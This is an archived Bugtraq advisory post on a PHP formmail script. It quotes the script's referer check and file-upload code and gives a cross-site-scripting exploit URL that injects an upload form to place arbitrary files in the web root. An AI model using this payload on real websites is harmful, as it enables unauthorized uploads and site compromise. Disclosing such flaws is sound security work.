formmail (PHP) Upload file using CSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: formmail (PHP) Upload file using CSS
From: Himeur Nourredine <lostnoobs@xxxxxxxxxxxxxxxxxxxxxx>
Date: 6 Feb 2004 11:36:52 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Informations : 
°°°°°°°°°°°°°° 
Website : http://www.dtheatre.com/scripts/
Version : all
Problem : Upload file



PHP Code/Location : 
°°°°°°°°°°°°°°°°°°° 
formmail.php : 
------------------------------------------------------------------ 
function check_referer($referers) {
   if (count($referers)) {
      $found = false;

      $temp = explode("/",getenv("HTTP_REFERER"));
      $referer = $temp[2];
      
      if ($referer=="") {$referer = $_SERVER['HTTP_REFERER'];
         list($remove,$stuff)=split('//',$referer,2);
         list($home,$stuff)=split('/',$stuff,2);
         $referer = $home;
      }
      
      for ($x=0; $x < count($referers); $x++) {
         if (eregi ($referers[$x], $referer)) {
            $found = true;
         }
      }
      if ($referer =="")
         $found = false;
      if (!$found){
         print_error("You are coming from an <b>unauthorized domain.</b>");
         error_log("[FormMail.php] Illegal Referer. 
(".getenv("HTTP_REFERER").")", 0);
      }
         return $found;
      } else {
         return true; // not a good idea, if empty, it will allow it.
   }
}
------------------------------------------------------------------ 
...
------------------------------------------------------------------ 
// check for a file if there is a file upload it
if ($file_name) {
   if ($file_size > 0) {
      if (!ereg("/$", $path_to_file))
         $path_to_file = $path_to_file."/";
      $location = $path_to_file.$file_name;
      if (file_exists($path_to_file.$file_name))
         $location = $path_to_file.rand(1000,3000).".".$file_name;
      copy($file,$location);
      unlink($file);
      $content .= "Uploaded File: ".$location."\n";
   }
}
------------------------------------------------------------------ 

You can bypassing the REFERER protection and put a file on the site (for 
exemple with a Cross Site Scripting on the same site).This option running even 
if this function is desactivated.

Exploit : 
°°°°°°°°° 

http://www.exemple.com/foo.php?css=<form%20method=post%20enctype=multipart/form-data%20action=formmail.php><input%20type=hidden%20name=MAX_FILE_SIZE%20value=1000000><input%20type=hidden%20name=path_to_file%20value=./><input%20type=text%20name=email><input%20type=file%20name=file%20><input%20type=hidden%20name=recipient%20%20value=%20foo@xxxxxxx%20><input%20type=submit>


Whith :
http://www.exemple.com/formmail.php
and
http://www.exemple.com/file.php?css= <-- Cross Site Scripting Here



For More details : 
°°°°°°°°°°°°°° 
IRC : hauzgur.serveirc.com / #defaced


Nourredine Himeur

www.security-challenge.com

Prev by Date: Re: MS to stop allowing passwords in URLs
Next by Date: Re: Hysterical first technical alert from US-CERT
Previous by thread: Multiple File Format Vulnerabilities (Overruns) in REALOne & RealPlayer
Next by thread: [RHSA-2004:030-01] Updated NetPBM packages fix multiple temporary file vulnerabilities
Index(es):
- Date
- Thread